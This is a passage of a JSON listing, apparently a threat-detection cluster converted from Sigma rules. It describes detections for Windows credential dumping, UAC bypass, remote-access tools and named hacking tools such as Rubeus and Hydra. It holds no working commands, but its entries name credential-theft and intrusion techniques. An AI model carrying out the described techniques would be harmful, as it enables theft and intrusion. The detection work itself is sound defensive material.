This is often used in combination with icacls to look for misconfigured files or folders permissions", - "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", - "value": "Suspicious Recon Activity Using Findstr Keywords", - "meta": { - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], - "creation_date": "2022/08/12", - "filename": "proc_creation_win_findstr_recon_everyone.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", - "value": "Windows Firewall Disabled via PowerShell", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2022/09/14", - "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", - "value": "Fast Reverse Proxy (FRP)", - "meta": { - "refs": [ - "https://asec.ahnlab.com/en/38156/", - "https://github.com/fatedier/frp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2022/09/02", - "filename": "proc_creation_win_frp.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attackers may leverage fsutil to enumerated connected drives.", - "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", - "value": "Fsutil Drive Enumeration", - "meta": { - "refs": [ - "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/", - "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1120" - ], - "creation_date": "2022/03/29", - "filename": "proc_creation_win_fsutil_drive_enumeration.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "low", - "falsepositive": [ - "Certain software or administrative tasks may trigger false positives." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", - "value": "Fsutil Behavior Set SymlinkEvaluation", - "meta": { - "refs": [ - "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", - "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/03/02", - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", - "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "meta": { - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "creation_date": "2022/10/10", - "filename": "proc_creation_win_get_localgroup_member_recon.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": 
"Detects the execution GMER tool based on image and hash fields.", - "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "value": "GMER - Rootkit Detector and Remover Execution", - "meta": { - "refs": [ - "http://www.gmer.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/10/05", - "filename": "proc_creation_win_gmer_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", - "value": "Use of GoToAssist Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_gotoopener.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", - "value": "Gpg4Win Decrypt Files From Suspicious Locations", - "meta": { - "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/11/30", - "filename": "proc_creation_win_gpg4win_susp_usage.yml", - "author": "Nasreddine Bencherchali, X__Junior", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Dump sam, system or security hives using REG.exe utility", - "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "value": "Grabbing Sensitive Hives via Reg Utility", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - 
"https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", - "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "value": "Windows Hacktool Imphash", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" - ], - "tags": "No established tags", - "creation_date": "2022/03/04", - "filename": "proc_creation_win_hacktool_imphashes.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of one of these tools" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", - "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "value": "ADCSPwn Hack Tool", - 
"meta": { - "refs": [ - "https://github.com/bats3c/ADCSPwn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1557.001" - ], - "creation_date": "2021/07/31", - "filename": "proc_creation_win_hack_adcspwn.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", - "value": "Bloodhound and Sharphound Hack Tool", - "meta": { - "refs": [ - "https://github.com/BloodHoundAD/BloodHound", - "https://github.com/BloodHoundAD/SharpHound", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/12/20", - "filename": "proc_creation_win_hack_bloodhound.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other programs that use these command line option and accepts an 'All' parameter" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)", - "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", - "value": "Hacktool by Cube0x0", - "meta": { - "refs": [ - "https://github.com/cube0x0", - "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/27", - "filename": "proc_creation_win_hack_cube0x0_tools.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", - "value": "Dumpert Process Dumper", - "meta": { - "refs": [ - "https://github.com/outflanknl/Dumpert", - "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2020/02/04", - "filename": "proc_creation_win_hack_dumpert.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", - "value": "Hydra Password Guessing Hack Tool", - "meta": { - "refs": [ - "https://github.com/vanhauser-thc/thc-hydra", - "https://attack.mitre.org/techniques/T1110/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_hack_hydra.yml", - "author": "Vasiliy Burov", - "level": "high", - "falsepositive": [ - "Software that uses the caret encased keywords PASS and USER in its command line" - ], - 
"logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "value": "Inveigh Hack Tool", - "meta": { - "refs": [ - "https://github.com/Kevin-Robertson/Inveigh", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/10/24", - "filename": "proc_creation_win_hack_inveigh.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters used by Koadic hack tool", - "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", - "value": "Koadic Execution", - "meta": { - "refs": [ - "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", - "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2020/01/12", - "filename": "proc_creation_win_hack_koadic.yml", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", - "value": "KrbRelay Hack 
Tool", - "meta": { - "refs": [ - "https://github.com/cube0x0/KrbRelay", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2022/04/27", - "filename": "proc_creation_win_hack_krbrelay.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", - "value": "KrbRelayUp Hack Tool", - "meta": { - "refs": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" - ], - "creation_date": "2022/04/26", - "filename": "proc_creation_win_hack_krbrelayup.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "value": "Rubeus Hack Tool", - "meta": { - "refs": [ - "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", - "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" - ], 
- "creation_date": "2018/12/19", - "filename": "proc_creation_win_hack_rubeus.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", - "value": "SafetyKatz Hack Tool", - "meta": { - "refs": [ - "https://github.com/GhostPack/SafetyKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/10/20", - "filename": "proc_creation_win_hack_safetykatz.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of SecurityXploded Tools", - "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "value": "SecurityXploded Tool", - "meta": { - "refs": [ - "https://securityxploded.com/", - "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ], - "creation_date": "2018/12/19", - "filename": "proc_creation_win_hack_secutyxploded.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", - "value": "SharPersist Usage", - 
"meta": { - "refs": [ - "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", - "https://github.com/mandiant/SharPersist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_win_hack_sharpersist.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller", - "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "value": "SharpLdapWhoami", - "meta": { - "refs": [ - "https://github.com/bugch3ck/SharpLdapWhoami", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ], - "creation_date": "2022/08/29", - "filename": "proc_creation_win_hack_sharpldapwhoami.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Programs that use the same command line flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "value": "SysmonEOP Hack Tool", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml" - ], - "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" - ], - "creation_date": "2022/12/04", - "filename": "proc_creation_win_hack_sysmoneop.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": 
[ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Windows Credential Editor (WCE)", - "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", - "value": "Windows Credential Editor", - "meta": { - "refs": [ - "https://www.ampliasecurity.com/research/windows-credentials-editor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" - ], - "creation_date": "2019/12/31", - "filename": "proc_creation_win_hack_wce.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Another service that uses a single -s command line switch" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", - "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", - "value": "HandleKatz LSASS Dumper Usage", - "meta": { - "refs": [ - "https://github.com/codewhitesec/HandleKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/08/18", - "filename": "proc_creation_win_handlekatz.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", - "value": "Password Cracking with Hashcat", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", - "https://hashcat.net/wiki/doku.php?id=hashcat", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110.002" - ], - "creation_date": "2021/12/27", - "filename": "proc_creation_win_hashcat.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Tools that accidentally use the same command line flags and values" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", - "value": "File Download with Headless Browser", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_headless_browser_file_download.yml", - "author": "Sreeman, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies usage of hh.exe executing recently modified .chm files.", - "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", - "value": "HH.exe Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_hh_chm.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.", - "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", - "value": "HH.exe Remote CHM File Execution", - "meta": { - "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ], - "creation_date": "2022/09/29", - "filename": "proc_creation_win_hh_chm_http.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. 
This folder doesn't require admin privillege to be written and executed from.", - "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", - "value": "Writing Of Malicious Files To The Fonts Folder", - "meta": { - "refs": [ - "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml" - ], - "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" - ], - "creation_date": "2020/04/21", - "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", - "value": "High Integrity Sdclt Process", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2020/05/02", - "filename": "proc_creation_win_high_integrity_sdclt.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "uuid": 
"36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", - "value": "CreateMiniDump Hacktool", - "meta": { - "refs": [ - "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/12/22", - "filename": "proc_creation_win_hktl_createminidump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata", - "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", - "value": "UAC Bypass Tool UACMe Akagi", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml", - "author": "Christian Burkard, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "value": "HTML Help Shell Spawn", - "meta": { - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", - 
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" - ], - "creation_date": "2020/04/01", - "filename": "proc_creation_win_html_help_spawn.yml", - "author": "Maxim Pavlunin", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", - "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "value": "Suspicious HWP Sub Processes", - "meta": { - "refs": [ - "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", - 